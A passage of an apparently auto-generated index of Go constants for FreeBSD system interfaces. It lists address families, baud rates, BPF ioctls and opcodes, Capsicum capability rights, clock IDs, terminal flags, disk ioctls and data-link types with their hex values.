AF_VENDOR09 (line 62) | AF_VENDOR09 = 0x39 constant AF_VENDOR10 (line 63) | AF_VENDOR10 = 0x3b constant AF_VENDOR11 (line 64) | AF_VENDOR11 = 0x3d constant AF_VENDOR12 (line 65) | AF_VENDOR12 = 0x3f constant AF_VENDOR13 (line 66) | AF_VENDOR13 = 0x41 constant AF_VENDOR14 (line 67) | AF_VENDOR14 = 0x43 constant AF_VENDOR15 (line 68) | AF_VENDOR15 = 0x45 constant AF_VENDOR16 (line 69) | AF_VENDOR16 = 0x47 constant AF_VENDOR17 (line 70) | AF_VENDOR17 = 0x49 constant AF_VENDOR18 (line 71) | AF_VENDOR18 = 0x4b constant AF_VENDOR19 (line 72) | AF_VENDOR19 = 0x4d constant AF_VENDOR20 (line 73) | AF_VENDOR20 = 0x4f constant AF_VENDOR21 (line 74) | AF_VENDOR21 = 0x51 constant AF_VENDOR22 (line 75) | AF_VENDOR22 = 0x53 constant AF_VENDOR23 (line 76) | AF_VENDOR23 = 0x55 constant AF_VENDOR24 (line 77) | AF_VENDOR24 = 0x57 constant AF_VENDOR25 (line 78) | AF_VENDOR25 = 0x59 constant AF_VENDOR26 (line 79) | AF_VENDOR26 = 0x5b constant AF_VENDOR27 (line 80) | AF_VENDOR27 = 0x5d constant AF_VENDOR28 (line 81) | AF_VENDOR28 = 0x5f constant AF_VENDOR29 (line 82) | AF_VENDOR29 = 0x61 constant AF_VENDOR30 (line 83) | AF_VENDOR30 = 0x63 constant AF_VENDOR31 (line 84) | AF_VENDOR31 = 0x65 constant AF_VENDOR32 (line 85) | AF_VENDOR32 = 0x67 constant AF_VENDOR33 (line 86) | AF_VENDOR33 = 0x69 constant AF_VENDOR34 (line 87) | AF_VENDOR34 = 0x6b constant AF_VENDOR35 (line 88) | AF_VENDOR35 = 0x6d constant AF_VENDOR36 (line 89) | AF_VENDOR36 = 0x6f constant AF_VENDOR37 (line 90) | AF_VENDOR37 = 0x71 constant AF_VENDOR38 (line 91) | AF_VENDOR38 = 0x73 constant AF_VENDOR39 (line 92) | AF_VENDOR39 = 0x75 constant AF_VENDOR40 (line 93) | AF_VENDOR40 = 0x77 constant AF_VENDOR41 (line 94) | AF_VENDOR41 = 0x79 constant AF_VENDOR42 (line 95) | AF_VENDOR42 = 0x7b constant AF_VENDOR43 (line 96) | AF_VENDOR43 = 0x7d constant AF_VENDOR44 (line 97) | AF_VENDOR44 = 0x7f constant AF_VENDOR45 (line 98) | AF_VENDOR45 = 0x81 constant AF_VENDOR46 (line 99) | AF_VENDOR46 = 0x83 constant AF_VENDOR47 (line 100) | AF_VENDOR47 = 0x85 constant ALTWERASE (line 101) | ALTWERASE = 0x200 constant B0 (line 102) | B0 = 0x0 constant B110 (line 103) | B110 = 0x6e constant B115200 (line 104) | B115200 = 0x1c200 constant B1200 (line 105) | B1200 = 0x4b0 constant B134 (line 106) | B134 = 0x86 constant B14400 (line 107) | B14400 = 0x3840 constant B150 (line 108) | B150 = 0x96 constant B1800 (line 109) | B1800 = 0x708 constant B19200 (line 110) | B19200 = 0x4b00 constant B200 (line 111) | B200 = 0xc8 constant B230400 (line 112) | B230400 = 0x38400 constant B2400 (line 113) | B2400 = 0x960 constant B28800 (line 114) | B28800 = 0x7080 constant B300 (line 115) | B300 = 0x12c constant B38400 (line 116) | B38400 = 0x9600 constant B460800 (line 117) | B460800 = 0x70800 constant B4800 (line 118) | B4800 = 0x12c0 constant B50 (line 119) | B50 = 0x32 constant B57600 (line 120) | B57600 = 0xe100 constant B600 (line 121) | B600 = 0x258 constant B7200 (line 122) | B7200 = 0x1c20 constant B75 (line 123) | B75 = 0x4b constant B76800 (line 124) | B76800 = 0x12c00 constant B921600 (line 125) | B921600 = 0xe1000 constant B9600 (line 126) | B9600 = 0x2580 constant BIOCFEEDBACK (line 127) | BIOCFEEDBACK = 0x8004427c constant BIOCFLUSH (line 128) | BIOCFLUSH = 0x20004268 constant BIOCGBLEN (line 129) | BIOCGBLEN = 0x40044266 constant BIOCGDIRECTION (line 130) | BIOCGDIRECTION = 0x40044276 constant BIOCGDLT (line 131) | BIOCGDLT = 0x4004426a constant BIOCGDLTLIST (line 132) | BIOCGDLTLIST = 0xc0104279 constant BIOCGETBUFMODE (line 133) | BIOCGETBUFMODE = 0x4004427d constant BIOCGETIF (line 134) | BIOCGETIF = 0x4020426b constant BIOCGETZMAX (line 135) | BIOCGETZMAX = 0x4008427f constant BIOCGHDRCMPLT (line 136) | BIOCGHDRCMPLT = 0x40044274 constant BIOCGRSIG (line 137) | BIOCGRSIG = 0x40044272 constant BIOCGRTIMEOUT (line 138) | BIOCGRTIMEOUT = 0x4010426e constant BIOCGSEESENT (line 139) | BIOCGSEESENT = 0x40044276 constant BIOCGSTATS (line 140) | BIOCGSTATS = 0x4008426f constant BIOCGTSTAMP (line 141) | BIOCGTSTAMP = 0x40044283 constant BIOCIMMEDIATE (line 142) | BIOCIMMEDIATE = 0x80044270 constant BIOCLOCK (line 143) | BIOCLOCK = 0x2000427a constant BIOCPROMISC (line 144) | BIOCPROMISC = 0x20004269 constant BIOCROTZBUF (line 145) | BIOCROTZBUF = 0x40184280 constant BIOCSBLEN (line 146) | BIOCSBLEN = 0xc0044266 constant BIOCSDIRECTION (line 147) | BIOCSDIRECTION = 0x80044277 constant BIOCSDLT (line 148) | BIOCSDLT = 0x80044278 constant BIOCSETBUFMODE (line 149) | BIOCSETBUFMODE = 0x8004427e constant BIOCSETF (line 150) | BIOCSETF = 0x80104267 constant BIOCSETFNR (line 151) | BIOCSETFNR = 0x80104282 constant BIOCSETIF (line 152) | BIOCSETIF = 0x8020426c constant BIOCSETVLANPCP (line 153) | BIOCSETVLANPCP = 0x80044285 constant BIOCSETWF (line 154) | BIOCSETWF = 0x8010427b constant BIOCSETZBUF (line 155) | BIOCSETZBUF = 0x80184281 constant BIOCSHDRCMPLT (line 156) | BIOCSHDRCMPLT = 0x80044275 constant BIOCSRSIG (line 157) | BIOCSRSIG = 0x80044273 constant BIOCSRTIMEOUT (line 158) | BIOCSRTIMEOUT = 0x8010426d constant BIOCSSEESENT (line 159) | BIOCSSEESENT = 0x80044277 constant BIOCSTSTAMP (line 160) | BIOCSTSTAMP = 0x80044284 constant BIOCVERSION (line 161) | BIOCVERSION = 0x40044271 constant BPF_A (line 162) | BPF_A = 0x10 constant BPF_ABS (line 163) | BPF_ABS = 0x20 constant BPF_ADD (line 164) | BPF_ADD = 0x0 constant BPF_ALIGNMENT (line 165) | BPF_ALIGNMENT = 0x8 constant BPF_ALU (line 166) | BPF_ALU = 0x4 constant BPF_AND (line 167) | BPF_AND = 0x50 constant BPF_B (line 168) | BPF_B = 0x10 constant BPF_BUFMODE_BUFFER (line 169) | BPF_BUFMODE_BUFFER = 0x1 constant BPF_BUFMODE_ZBUF (line 170) | BPF_BUFMODE_ZBUF = 0x2 constant BPF_DIV (line 171) | BPF_DIV = 0x30 constant BPF_H (line 172) | BPF_H = 0x8 constant BPF_IMM (line 173) | BPF_IMM = 0x0 constant BPF_IND (line 174) | BPF_IND = 0x40 constant BPF_JA (line 175) | BPF_JA = 0x0 constant BPF_JEQ (line 176) | BPF_JEQ = 0x10 constant BPF_JGE (line 177) | BPF_JGE = 0x30 constant BPF_JGT (line 178) | BPF_JGT = 0x20 constant BPF_JMP (line 179) | BPF_JMP = 0x5 constant BPF_JSET (line 180) | BPF_JSET = 0x40 constant BPF_K (line 181) | BPF_K = 0x0 constant BPF_LD (line 182) | BPF_LD = 0x0 constant BPF_LDX (line 183) | BPF_LDX = 0x1 constant BPF_LEN (line 184) | BPF_LEN = 0x80 constant BPF_LSH (line 185) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 186) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXBUFSIZE (line 187) | BPF_MAXBUFSIZE = 0x80000 constant BPF_MAXINSNS (line 188) | BPF_MAXINSNS = 0x200 constant BPF_MEM (line 189) | BPF_MEM = 0x60 constant BPF_MEMWORDS (line 190) | BPF_MEMWORDS = 0x10 constant BPF_MINBUFSIZE (line 191) | BPF_MINBUFSIZE = 0x20 constant BPF_MINOR_VERSION (line 192) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 193) | BPF_MISC = 0x7 constant BPF_MOD (line 194) | BPF_MOD = 0x90 constant BPF_MSH (line 195) | BPF_MSH = 0xa0 constant BPF_MUL (line 196) | BPF_MUL = 0x20 constant BPF_NEG (line 197) | BPF_NEG = 0x80 constant BPF_OR (line 198) | BPF_OR = 0x40 constant BPF_RELEASE (line 199) | BPF_RELEASE = 0x30bb6 constant BPF_RET (line 200) | BPF_RET = 0x6 constant BPF_RSH (line 201) | BPF_RSH = 0x70 constant BPF_ST (line 202) | BPF_ST = 0x2 constant BPF_STX (line 203) | BPF_STX = 0x3 constant BPF_SUB (line 204) | BPF_SUB = 0x10 constant BPF_TAX (line 205) | BPF_TAX = 0x0 constant BPF_TXA (line 206) | BPF_TXA = 0x80 constant BPF_T_BINTIME (line 207) | BPF_T_BINTIME = 0x2 constant BPF_T_BINTIME_FAST (line 208) | BPF_T_BINTIME_FAST = 0x102 constant BPF_T_BINTIME_MONOTONIC (line 209) | BPF_T_BINTIME_MONOTONIC = 0x202 constant BPF_T_BINTIME_MONOTONIC_FAST (line 210) | BPF_T_BINTIME_MONOTONIC_FAST = 0x302 constant BPF_T_FAST (line 211) | BPF_T_FAST = 0x100 constant BPF_T_FLAG_MASK (line 212) | BPF_T_FLAG_MASK = 0x300 constant BPF_T_FORMAT_MASK (line 213) | BPF_T_FORMAT_MASK = 0x3 constant BPF_T_MICROTIME (line 214) | BPF_T_MICROTIME = 0x0 constant BPF_T_MICROTIME_FAST (line 215) | BPF_T_MICROTIME_FAST = 0x100 constant BPF_T_MICROTIME_MONOTONIC (line 216) | BPF_T_MICROTIME_MONOTONIC = 0x200 constant BPF_T_MICROTIME_MONOTONIC_FAST (line 217) | BPF_T_MICROTIME_MONOTONIC_FAST = 0x300 constant BPF_T_MONOTONIC (line 218) | BPF_T_MONOTONIC = 0x200 constant BPF_T_MONOTONIC_FAST (line 219) | BPF_T_MONOTONIC_FAST = 0x300 constant BPF_T_NANOTIME (line 220) | BPF_T_NANOTIME = 0x1 constant BPF_T_NANOTIME_FAST (line 221) | BPF_T_NANOTIME_FAST = 0x101 constant BPF_T_NANOTIME_MONOTONIC (line 222) | BPF_T_NANOTIME_MONOTONIC = 0x201 constant BPF_T_NANOTIME_MONOTONIC_FAST (line 223) | BPF_T_NANOTIME_MONOTONIC_FAST = 0x301 constant BPF_T_NONE (line 224) | BPF_T_NONE = 0x3 constant BPF_T_NORMAL (line 225) | BPF_T_NORMAL = 0x0 constant BPF_W (line 226) | BPF_W = 0x0 constant BPF_X (line 227) | BPF_X = 0x8 constant BPF_XOR (line 228) | BPF_XOR = 0xa0 constant BRKINT (line 229) | BRKINT = 0x2 constant CAP_ACCEPT (line 230) | CAP_ACCEPT = 0x200000020000000 constant CAP_ACL_CHECK (line 231) | CAP_ACL_CHECK = 0x400000000010000 constant CAP_ACL_DELETE (line 232) | CAP_ACL_DELETE = 0x400000000020000 constant CAP_ACL_GET (line 233) | CAP_ACL_GET = 0x400000000040000 constant CAP_ACL_SET (line 234) | CAP_ACL_SET = 0x400000000080000 constant CAP_ALL0 (line 235) | CAP_ALL0 = 0x20007ffffffffff constant CAP_ALL1 (line 236) | CAP_ALL1 = 0x4000000001fffff constant CAP_BIND (line 237) | CAP_BIND = 0x200000040000000 constant CAP_BINDAT (line 238) | CAP_BINDAT = 0x200008000000400 constant CAP_CHFLAGSAT (line 239) | CAP_CHFLAGSAT = 0x200000000001400 constant CAP_CONNECT (line 240) | CAP_CONNECT = 0x200000080000000 constant CAP_CONNECTAT (line 241) | CAP_CONNECTAT = 0x200010000000400 constant CAP_CREATE (line 242) | CAP_CREATE = 0x200000000000040 constant CAP_EVENT (line 243) | CAP_EVENT = 0x400000000000020 constant CAP_EXTATTR_DELETE (line 244) | CAP_EXTATTR_DELETE = 0x400000000001000 constant CAP_EXTATTR_GET (line 245) | CAP_EXTATTR_GET = 0x400000000002000 constant CAP_EXTATTR_LIST (line 246) | CAP_EXTATTR_LIST = 0x400000000004000 constant CAP_EXTATTR_SET (line 247) | CAP_EXTATTR_SET = 0x400000000008000 constant CAP_FCHDIR (line 248) | CAP_FCHDIR = 0x200000000000800 constant CAP_FCHFLAGS (line 249) | CAP_FCHFLAGS = 0x200000000001000 constant CAP_FCHMOD (line 250) | CAP_FCHMOD = 0x200000000002000 constant CAP_FCHMODAT (line 251) | CAP_FCHMODAT = 0x200000000002400 constant CAP_FCHOWN (line 252) | CAP_FCHOWN = 0x200000000004000 constant CAP_FCHOWNAT (line 253) | CAP_FCHOWNAT = 0x200000000004400 constant CAP_FCNTL (line 254) | CAP_FCNTL = 0x200000000008000 constant CAP_FCNTL_ALL (line 255) | CAP_FCNTL_ALL = 0x78 constant CAP_FCNTL_GETFL (line 256) | CAP_FCNTL_GETFL = 0x8 constant CAP_FCNTL_GETOWN (line 257) | CAP_FCNTL_GETOWN = 0x20 constant CAP_FCNTL_SETFL (line 258) | CAP_FCNTL_SETFL = 0x10 constant CAP_FCNTL_SETOWN (line 259) | CAP_FCNTL_SETOWN = 0x40 constant CAP_FEXECVE (line 260) | CAP_FEXECVE = 0x200000000000080 constant CAP_FLOCK (line 261) | CAP_FLOCK = 0x200000000010000 constant CAP_FPATHCONF (line 262) | CAP_FPATHCONF = 0x200000000020000 constant CAP_FSCK (line 263) | CAP_FSCK = 0x200000000040000 constant CAP_FSTAT (line 264) | CAP_FSTAT = 0x200000000080000 constant CAP_FSTATAT (line 265) | CAP_FSTATAT = 0x200000000080400 constant CAP_FSTATFS (line 266) | CAP_FSTATFS = 0x200000000100000 constant CAP_FSYNC (line 267) | CAP_FSYNC = 0x200000000000100 constant CAP_FTRUNCATE (line 268) | CAP_FTRUNCATE = 0x200000000000200 constant CAP_FUTIMES (line 269) | CAP_FUTIMES = 0x200000000200000 constant CAP_FUTIMESAT (line 270) | CAP_FUTIMESAT = 0x200000000200400 constant CAP_GETPEERNAME (line 271) | CAP_GETPEERNAME = 0x200000100000000 constant CAP_GETSOCKNAME (line 272) | CAP_GETSOCKNAME = 0x200000200000000 constant CAP_GETSOCKOPT (line 273) | CAP_GETSOCKOPT = 0x200000400000000 constant CAP_IOCTL (line 274) | CAP_IOCTL = 0x400000000000080 constant CAP_IOCTLS_ALL (line 275) | CAP_IOCTLS_ALL = 0x7fffffffffffffff constant CAP_KQUEUE (line 276) | CAP_KQUEUE = 0x400000000100040 constant CAP_KQUEUE_CHANGE (line 277) | CAP_KQUEUE_CHANGE = 0x400000000100000 constant CAP_KQUEUE_EVENT (line 278) | CAP_KQUEUE_EVENT = 0x400000000000040 constant CAP_LINKAT_SOURCE (line 279) | CAP_LINKAT_SOURCE = 0x200020000000400 constant CAP_LINKAT_TARGET (line 280) | CAP_LINKAT_TARGET = 0x200000000400400 constant CAP_LISTEN (line 281) | CAP_LISTEN = 0x200000800000000 constant CAP_LOOKUP (line 282) | CAP_LOOKUP = 0x200000000000400 constant CAP_MAC_GET (line 283) | CAP_MAC_GET = 0x400000000000001 constant CAP_MAC_SET (line 284) | CAP_MAC_SET = 0x400000000000002 constant CAP_MKDIRAT (line 285) | CAP_MKDIRAT = 0x200000000800400 constant CAP_MKFIFOAT (line 286) | CAP_MKFIFOAT = 0x200000001000400 constant CAP_MKNODAT (line 287) | CAP_MKNODAT = 0x200000002000400 constant CAP_MMAP (line 288) | CAP_MMAP = 0x200000000000010 constant CAP_MMAP_R (line 289) | CAP_MMAP_R = 0x20000000000001d constant CAP_MMAP_RW (line 290) | CAP_MMAP_RW = 0x20000000000001f constant CAP_MMAP_RWX (line 291) | CAP_MMAP_RWX = 0x20000000000003f constant CAP_MMAP_RX (line 292) | CAP_MMAP_RX = 0x20000000000003d constant CAP_MMAP_W (line 293) | CAP_MMAP_W = 0x20000000000001e constant CAP_MMAP_WX (line 294) | CAP_MMAP_WX = 0x20000000000003e constant CAP_MMAP_X (line 295) | CAP_MMAP_X = 0x20000000000003c constant CAP_PDGETPID (line 296) | CAP_PDGETPID = 0x400000000000200 constant CAP_PDKILL (line 297) | CAP_PDKILL = 0x400000000000800 constant CAP_PDWAIT (line 298) | CAP_PDWAIT = 0x400000000000400 constant CAP_PEELOFF (line 299) | CAP_PEELOFF = 0x200001000000000 constant CAP_POLL_EVENT (line 300) | CAP_POLL_EVENT = 0x400000000000020 constant CAP_PREAD (line 301) | CAP_PREAD = 0x20000000000000d constant CAP_PWRITE (line 302) | CAP_PWRITE = 0x20000000000000e constant CAP_READ (line 303) | CAP_READ = 0x200000000000001 constant CAP_RECV (line 304) | CAP_RECV = 0x200000000000001 constant CAP_RENAMEAT_SOURCE (line 305) | CAP_RENAMEAT_SOURCE = 0x200000004000400 constant CAP_RENAMEAT_TARGET (line 306) | CAP_RENAMEAT_TARGET = 0x200040000000400 constant CAP_RIGHTS_VERSION (line 307) | CAP_RIGHTS_VERSION = 0x0 constant CAP_RIGHTS_VERSION_00 (line 308) | CAP_RIGHTS_VERSION_00 = 0x0 constant CAP_SEEK (line 309) | CAP_SEEK = 0x20000000000000c constant CAP_SEEK_TELL (line 310) | CAP_SEEK_TELL = 0x200000000000004 constant CAP_SEM_GETVALUE (line 311) | CAP_SEM_GETVALUE = 0x400000000000004 constant CAP_SEM_POST (line 312) | CAP_SEM_POST = 0x400000000000008 constant CAP_SEM_WAIT (line 313) | CAP_SEM_WAIT = 0x400000000000010 constant CAP_SEND (line 314) | CAP_SEND = 0x200000000000002 constant CAP_SETSOCKOPT (line 315) | CAP_SETSOCKOPT = 0x200002000000000 constant CAP_SHUTDOWN (line 316) | CAP_SHUTDOWN = 0x200004000000000 constant CAP_SOCK_CLIENT (line 317) | CAP_SOCK_CLIENT = 0x200007780000003 constant CAP_SOCK_SERVER (line 318) | CAP_SOCK_SERVER = 0x200007f60000003 constant CAP_SYMLINKAT (line 319) | CAP_SYMLINKAT = 0x200000008000400 constant CAP_TTYHOOK (line 320) | CAP_TTYHOOK = 0x400000000000100 constant CAP_UNLINKAT (line 321) | CAP_UNLINKAT = 0x200000010000400 constant CAP_UNUSED0_44 (line 322) | CAP_UNUSED0_44 = 0x200080000000000 constant CAP_UNUSED0_57 (line 323) | CAP_UNUSED0_57 = 0x300000000000000 constant CAP_UNUSED1_22 (line 324) | CAP_UNUSED1_22 = 0x400000000200000 constant CAP_UNUSED1_57 (line 325) | CAP_UNUSED1_57 = 0x500000000000000 constant CAP_WRITE (line 326) | CAP_WRITE = 0x200000000000002 constant CFLUSH (line 327) | CFLUSH = 0xf constant CLOCAL (line 328) | CLOCAL = 0x8000 constant CLOCK_MONOTONIC (line 329) | CLOCK_MONOTONIC = 0x4 constant CLOCK_MONOTONIC_FAST (line 330) | CLOCK_MONOTONIC_FAST = 0xc constant CLOCK_MONOTONIC_PRECISE (line 331) | CLOCK_MONOTONIC_PRECISE = 0xb constant CLOCK_PROCESS_CPUTIME_ID (line 332) | CLOCK_PROCESS_CPUTIME_ID = 0xf constant CLOCK_PROF (line 333) | CLOCK_PROF = 0x2 constant CLOCK_REALTIME (line 334) | CLOCK_REALTIME = 0x0 constant CLOCK_REALTIME_FAST (line 335) | CLOCK_REALTIME_FAST = 0xa constant CLOCK_REALTIME_PRECISE (line 336) | CLOCK_REALTIME_PRECISE = 0x9 constant CLOCK_SECOND (line 337) | CLOCK_SECOND = 0xd constant CLOCK_THREAD_CPUTIME_ID (line 338) | CLOCK_THREAD_CPUTIME_ID = 0xe constant CLOCK_UPTIME (line 339) | CLOCK_UPTIME = 0x5 constant CLOCK_UPTIME_FAST (line 340) | CLOCK_UPTIME_FAST = 0x8 constant CLOCK_UPTIME_PRECISE (line 341) | CLOCK_UPTIME_PRECISE = 0x7 constant CLOCK_VIRTUAL (line 342) | CLOCK_VIRTUAL = 0x1 constant CPUSTATES (line 343) | CPUSTATES = 0x5 constant CP_IDLE (line 344) | CP_IDLE = 0x4 constant CP_INTR (line 345) | CP_INTR = 0x3 constant CP_NICE (line 346) | CP_NICE = 0x1 constant CP_SYS (line 347) | CP_SYS = 0x2 constant CP_USER (line 348) | CP_USER = 0x0 constant CREAD (line 349) | CREAD = 0x800 constant CRTSCTS (line 350) | CRTSCTS = 0x30000 constant CS5 (line 351) | CS5 = 0x0 constant CS6 (line 352) | CS6 = 0x100 constant CS7 (line 353) | CS7 = 0x200 constant CS8 (line 354) | CS8 = 0x300 constant CSIZE (line 355) | CSIZE = 0x300 constant CSTART (line 356) | CSTART = 0x11 constant CSTATUS (line 357) | CSTATUS = 0x14 constant CSTOP (line 358) | CSTOP = 0x13 constant CSTOPB (line 359) | CSTOPB = 0x400 constant CSUSP (line 360) | CSUSP = 0x1a constant CTL_HW (line 361) | CTL_HW = 0x6 constant CTL_KERN (line 362) | CTL_KERN = 0x1 constant CTL_MAXNAME (line 363) | CTL_MAXNAME = 0x18 constant CTL_NET (line 364) | CTL_NET = 0x4 constant DIOCGATTR (line 365) | DIOCGATTR = 0xc148648e constant DIOCGDELETE (line 366) | DIOCGDELETE = 0x80106488 constant DIOCGFLUSH (line 367) | DIOCGFLUSH = 0x20006487 constant DIOCGFRONTSTUFF (line 368) | DIOCGFRONTSTUFF = 0x40086486 constant DIOCGFWHEADS (line 369) | DIOCGFWHEADS = 0x40046483 constant DIOCGFWSECTORS (line 370) | DIOCGFWSECTORS = 0x40046482 constant DIOCGIDENT (line 371) | DIOCGIDENT = 0x41006489 constant DIOCGMEDIASIZE (line 372) | DIOCGMEDIASIZE = 0x40086481 constant DIOCGPHYSPATH (line 373) | DIOCGPHYSPATH = 0x4400648d constant DIOCGPROVIDERNAME (line 374) | DIOCGPROVIDERNAME = 0x4400648a constant DIOCGSECTORSIZE (line 375) | DIOCGSECTORSIZE = 0x40046480 constant DIOCGSTRIPEOFFSET (line 376) | DIOCGSTRIPEOFFSET = 0x4008648c constant DIOCGSTRIPESIZE (line 377) | DIOCGSTRIPESIZE = 0x4008648b constant DIOCSKERNELDUMP (line 378) | DIOCSKERNELDUMP = 0x80506490 constant DIOCSKERNELDUMP_FREEBSD11 (line 379) | DIOCSKERNELDUMP_FREEBSD11 = 0x80046485 constant DIOCZONECMD (line 380) | DIOCZONECMD = 0xc080648f constant DLT_A429 (line 381) | DLT_A429 = 0xb8 constant DLT_A653_ICM (line 382) | DLT_A653_ICM = 0xb9 constant DLT_AIRONET_HEADER (line 383) | DLT_AIRONET_HEADER = 0x78 constant DLT_AOS (line 384) | DLT_AOS = 0xde constant DLT_APPLE_IP_OVER_IEEE1394 (line 385) | DLT_APPLE_IP_OVER_IEEE1394 = 0x8a constant DLT_ARCNET (line 386) | DLT_ARCNET = 0x7 constant DLT_ARCNET_LINUX (line 387) | DLT_ARCNET_LINUX = 0x81 constant DLT_ATM_CLIP (line 388) | DLT_ATM_CLIP = 0x13 constant DLT_ATM_RFC1483 (line 389) | DLT_ATM_RFC1483 = 0xb constant DLT_AURORA (line 390) | DLT_AURORA = 0x7e constant DLT_AX25 (line 391) | DLT_AX25 = 0x3 constant DLT_AX25_KISS (line 392) | DLT_AX25_KISS = 0xca constant DLT_BACNET_MS_TP (line 393) | DLT_BACNET_MS_TP = 0xa5 constant DLT_BLUETOOTH_BREDR_BB (line 394) | DLT_BLUETOOTH_BREDR_BB = 0xff constant DLT_BLUETOOTH_HCI_H4 (line 395) | DLT_BLUETOOTH_HCI_H4 = 0xbb constant DLT_BLUETOOTH_HCI_H4_WITH_PHDR (line 396) | DLT_BLUETOOTH_HCI_H4_WITH_PHDR = 0xc9 constant DLT_BLUETOOTH_LE_LL (line 397) | DLT_BLUETOOTH_LE_LL = 0xfb constant DLT_BLUETOOTH_LE_LL_WITH_PHDR (line 398) | DLT_BLUETOOTH_LE_LL_WITH_PHDR = 0x100 constant DLT_BLUETOOTH_LINUX_MONITOR (line 399) | DLT_BLUETOOTH_LINUX_MONITOR = 0xfe constant DLT_CAN20B (line 400) | DLT_CAN20B = 0xbe constant DLT_CAN_SOCKETCAN (line 401) | DLT_CAN_SOCKETCAN = 0xe3 constant DLT_CHAOS (line 402) | DLT_CHAOS = 0x5 constant DLT_CHDLC (line 403) | DLT_CHDLC = 0x68 constant DLT_CISCO_IOS (line 404) | DLT_CISCO_IOS = 0x76 constant DLT_CLASS_NETBSD_RAWAF (line 405) | DLT_CLASS_NETBSD_RAWAF = 0x2240000 constant DLT_C_HDLC (line 406) | DLT_C_HDLC = 0x68 constant DLT_C_HDLC_WITH_DIR (line 407) | DLT_C_HDLC_WITH_DIR = 0xcd constant DLT_DBUS (line 408) | DLT_DBUS = 0xe7 constant DLT_DECT (line 409) | DLT_DECT = 0xdd constant DLT_DISPLAYPORT_AUX (line 410) | DLT_DISPLAYPORT_AUX = 0x113 constant DLT_DOCSIS (line 411) | DLT_DOCSIS = 0x8f constant DLT_DOCSIS31_XRA31 (line 412) | DLT_DOCSIS31_XRA31 = 0x111 constant DLT_DVB_CI (line 413) | DLT_DVB_CI = 0xeb constant DLT_ECONET (line 414) | DLT_ECONET = 0x73 constant DLT_EN10MB (line 415) | DLT_EN10MB = 0x1 constant DLT_EN3MB (line 416) | DLT_EN3MB = 0x2 constant DLT_ENC (line 417) | DLT_ENC = 0x6d constant DLT_EPON (line 418) | DLT_EPON = 0x103 constant DLT_ERF (line 419) | DLT_ERF = 0xc5 constant DLT_ERF_ETH (line 420) | DLT_ERF_ETH = 0xaf constant DLT_ERF_POS (line 421) | DLT_ERF_POS = 0xb0 constant DLT_ETHERNET_MPACKET (line 422) | DLT_ETHERNET_MPACKET = 0x112 constant DLT_FC_2 (line 423) | DLT_FC_2 = 0xe0 constant DLT_FC_2_WITH_FRAME_DELIMS (line 424) | DLT_FC_2_WITH_FRAME_DELIMS = 0xe1 constant DLT_FDDI (line 425) | DLT_FDDI = 0xa constant DLT_FLEXRAY (line 426) | DLT_FLEXRAY = 0xd2 constant DLT_FRELAY (line 427) | DLT_FRELAY = 0x6b constant DLT_FRELAY_WITH_DIR (line 428) | DLT_FRELAY_WITH_DIR = 0xce constant DLT_GCOM_SERIAL (line 429) | DLT_GCOM_SERIAL = 0xad constant DLT_GCOM_T1E1 (line 430) | DLT_GCOM_T1E1 = 0xac constant DLT_GPF_F (line 431) | DLT_GPF_F = 0xab constant DLT_GPF_T (line 432) | DLT_GPF_T = 0xaa constant DLT_GPRS_LLC (line 433) | DLT_GPRS_LLC = 0xa9 constant DLT_GSMTAP_ABIS (line 434) | DLT_GSMTAP_ABIS = 0xda constant DLT_GSMTAP_UM (line 435) | DLT_GSMTAP_UM = 0xd9 constant DLT_IBM_SN (line 436) | DLT_IBM_SN = 0x92 constant DLT_IBM_SP (line 437) | DLT_IBM_SP = 0x91 constant DLT_IEEE802 (line 438) | DLT_IEEE802 = 0x6 constant DLT_IEEE802_11 (line 439) | DLT_IEEE802_11 = 0x69 constant DLT_IEEE802_11_RADIO (line 440) | DLT_IEEE802_11_RADIO = 0x7f constant DLT_IEEE802_11_RADIO_AVS (line 441) | DLT_IEEE802_11_RADIO_AVS = 0xa3 constant DLT_IEEE802_15_4 (line 442) | DLT_IEEE802_15_4 = 0xc3 constant DLT_IEEE802_15_4_LINUX (line 443) | DLT_IEEE802_15_4_LINUX = 0xbf constant DLT_IEEE802_15_4_NOFCS (line 444) | DLT_IEEE802_15_4_NOFCS = 0xe6 constant DLT_IEEE802_15_4_NONASK_PHY (line 445) | DLT_IEEE802_15_4_NONASK_PHY = 0xd7 constant DLT_IEEE802_16_MAC_CPS (line 446) | DLT_IEEE802_16_MAC_CPS = 0xbc constant DLT_IEEE802_16_MAC_CPS_RADIO (line 447) | DLT_IEEE802_16_MAC_CPS_RADIO = 0xc1 constant DLT_INFINIBAND (line 448) | DLT_INFINIBAND = 0xf7 constant DLT_IPFILTER (line 449) | DLT_IPFILTER = 0x74 constant DLT_IPMB_KONTRON (line 450) | DLT_IPMB_KONTRON = 0xc7 constant DLT_IPMB_LINUX (line 451) | DLT_IPMB_LINUX = 0xd1 constant DLT_IPMI_HPM_2 (line 452) | DLT_IPMI_HPM_2 = 0x104 constant DLT_IPNET (line 453) | DLT_IPNET = 0xe2 constant DLT_IPOIB (line 454) | DLT_IPOIB = 0xf2 constant DLT_IPV4 (line 455) | DLT_IPV4 = 0xe4 constant DLT_IPV6 (line 456) | DLT_IPV6 = 0xe5 constant DLT_IP_OVER_FC (line 457) | DLT_IP_OVER_FC = 0x7a constant DLT_ISO_14443 (line 458) | DLT_ISO_14443 = 0x108 constant DLT_JUNIPER_ATM1 (line 459) | DLT_JUNIPER_ATM1 = 0x89 constant DLT_JUNIPER_ATM2 (line 460) | DLT_JUNIPER_ATM2 = 0x87 constant DLT_JUNIPER_ATM_CEMIC (line 461) | DLT_JUNIPER_ATM_CEMIC = 0xee constant DLT_JUNIPER_CHDLC (line 462) | DLT_JUNIPER_CHDLC = 0xb5 constant DLT_JUNIPER_ES (line 463) | DLT_JUNIPER_ES = 0x84 constant DLT_JUNIPER_ETHER (line 464) | DLT_JUNIPER_ETHER = 0xb2 constant DLT_JUNIPER_FIBRECHANNEL (line 465) | DLT_JUNIPER_FIBRECHANNEL = 0xea constant DLT_JUNIPER_FRELAY (line 466) | DLT_JUNIPER_FRELAY = 0xb4 constant DLT_JUNIPER_GGSN (line 467) | DLT_JUNIPER_GGSN = 0x85 constant DLT_JUNIPER_ISM (line 468) | DLT_JUNIPER_ISM = 0xc2 constant DLT_JUNIPER_MFR (line 469) | DLT_JUNIPER_MFR = 0x86 constant DLT_JUNIPER_MLFR (line 470) | DLT_JUNIPER_MLFR = 0x83 constant DLT_JUNIPER_MLPPP (line 471) | 